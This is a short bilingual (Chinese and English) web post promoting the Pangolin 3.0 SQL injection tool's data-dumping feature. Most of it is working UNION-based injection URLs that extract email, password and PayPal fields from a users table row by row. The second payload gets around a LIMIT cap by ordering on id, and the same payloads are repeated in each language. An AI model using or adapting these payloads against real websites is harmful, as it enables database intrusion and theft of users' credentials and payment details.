Pangolin 3.0 DataDumper Expert

2009-09-20 15:10:08 作者：NOSEC 来源：浏览次数：0 网友评论 0 条

Why we call Pangolin "DataDumper Expert"?
Normally there are tow ways to dump data:

一般有两种获取数据的模式：

完全通过limit：
http://www.site.com/m.php?id=1 and 1=2 union select 1,2,concat(0x5e24,0x7c,email,0x7c,passwd,0x7c,paypal,0x245e),4,5,6,7,8,9,10,11,12,13 From beg_users limit {index},1#
通过id排序获取，某些时候limit可能会进行了某些限制，如某侧客户在测试时发现不能limit超过760条，这时用如下方法可以进行完整的数据获取：
http://www.site.com/m.php?id=1 and 1=2 union select 1,2,concat(0x5e24,0x7c,email,0x7c,passwd,0x7c,paypal,0x245e),4,5,6,7,8,9,10,11,12,13 From beg_users where id>(select id from beg_users order by id limit {index},1) order by id limit 1#

Normally there are tow ways to dump data:

By Limit:
http://www.site.com/m.php?id=1 and 1=2 union select 1,2,concat(0x5e24,0x7c,email,0x7c,passwd,0x7c,paypal,0x245e),4,5,6,7,8,9,10,11,12,13 From beg_users limit {index},1#
By sorting collumn id. Sometime Limit been limited. For example: we can not Limit upto 760 lines but following way will help you dump all data:
http://www.site.com/m.php?id=1 and 1=2 union select 1,2,concat(0x5e24,0x7c,email,0x7c,passwd,0x7c,paypal,0x245e),4,5,6,7,8,9,10,11,12,13 From beg_users where id>(select id from beg_users order by id limit {index},1) order by id limit 1#